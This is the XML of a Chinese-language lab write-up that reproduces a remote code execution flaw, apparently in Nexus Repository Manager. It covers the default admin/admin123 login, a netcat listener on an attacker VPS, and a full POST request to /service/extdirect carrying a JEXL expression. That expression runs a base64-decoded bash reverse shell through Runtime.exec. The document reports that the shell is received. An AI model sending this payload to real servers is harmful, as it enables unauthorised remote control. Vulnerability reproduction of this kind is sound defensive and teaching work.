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EA0" w:rsidRPr="003B002E" w:rsidRDefault="003B002E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B002E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B002E" w:rsidRDefault="003B002E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3B002E" w:rsidRDefault="003B002E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5251938" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2540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93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02E" w:rsidRDefault="00B31BA9">
                            <w:r w:rsidRPr="00B31BA9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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="003B002E" w:rsidRDefault="00B31BA9">
                      <w:r w:rsidRPr="00B31BA9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002E" w:rsidRDefault="003B002E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:r w:rsidR="00AA4694">
        <w:t>8081</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可看到w</w:t>
      </w:r>
      <w:r>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，使用账号密码a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin/admin123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录后台，再m</w:t>
      </w:r>
      <w:r>
        <w:t>aven-releases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下随便上传一个j</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包（触发该漏洞，必须保证仓库中至少有一个包）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B002E" w:rsidRDefault="006A3FBD">
      <w:r w:rsidRPr="006A3FBD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2665768"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="4" name="图片 4" descr="C:\Users\Toby\AppData\Local\Temp\165371643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716437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02E" w:rsidRDefault="003B002E"/>
    <w:p w:rsidR="003B002E" w:rsidRPr="003B002E" w:rsidRDefault="003B002E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B002E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B738D" w:rsidRDefault="003B002E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidR="007B738D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="007B738D">
        <w:t>PS</w:t>
      </w:r>
      <w:r w:rsidR="007B738D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B738D" w:rsidRPr="007B738D" w:rsidRDefault="007B738D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38D" w:rsidRDefault="007B738D">
                            <w:r>
                              <w:t>nc –lvnp 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5aGyp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7B738D" w:rsidRDefault="007B738D">
                      <w:r>
                        <w:t>nc –lvnp 8888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002E" w:rsidRDefault="007B738D">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="003B002E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送如下数据包，即可执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidR="003B002E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC3EE4" w:rsidRDefault="00BC3EE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05046" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="15240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0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EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>POST /service/extdirect HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>Host: localhost</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>Content-Type: application/json</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>X-Requested-With: XMLHttpRequest</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>Content-Length: 368</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4"/>
                          <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('</w:t>
                            </w:r>
                            <w:r w:rsidR="004D68E7" w:rsidRPr="004D68E7">
                              <w:t xml:space="preserve"> bash -c {echo,xxxx}|{base64,-d}|{bash,-i}</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BC3EE4">
                              <w:t>')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>POST /service/extdirect HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>Host: localhost</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>Content-Type: application/json</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>X-Requested-With: XMLHttpRequest</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>Content-Length: 368</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4"/>
                    <w:p w:rsidR="00BC3EE4" w:rsidRPr="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00BC3EE4" w:rsidRDefault="00BC3EE4" w:rsidP="00BC3EE4">
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('</w:t>
                      </w:r>
                      <w:r w:rsidR="004D68E7" w:rsidRPr="004D68E7">
                        <w:t xml:space="preserve"> bash -c {echo,xxxx}|{base64,-d}|{bash,-i}</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BC3EE4">
                        <w:t>')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}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002E" w:rsidRDefault="007B738D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003B002E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功接收s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B738D" w:rsidRDefault="007B738D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF091CA" wp14:editId="4991B214">
            <wp:extent cx="5274310" cy="855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5DD" w:rsidRDefault="004B45DD" w:rsidP="003B002E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004B45DD" w:rsidRDefault="004B45DD" w:rsidP="003B0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5DD" w:rsidRDefault="004B45DD" w:rsidP="003B002E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004B45DD" w:rsidRDefault="004B45DD" w:rsidP="003B0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EF"/>
    <w:rsid w:val="003B002E"/>
    <w:rsid w:val="004B45DD"/>
    <w:rsid w:val="004D68E7"/>
    <w:rsid w:val="006A3FBD"/>
    <w:rsid w:val="007B738D"/>
    <w:rsid w:val="00AA4694"/>
    <w:rsid w:val="00AC3EA0"/>
    <w:rsid w:val="00B31BA9"/>
    <w:rsid w:val="00BC0E75"/>
    <w:rsid w:val="00BC3EE4"/>
    <w:rsid w:val="00C2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8300B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A13967D9-F441-41C7-84D0-8BC09ED1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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-27T14:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T05:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>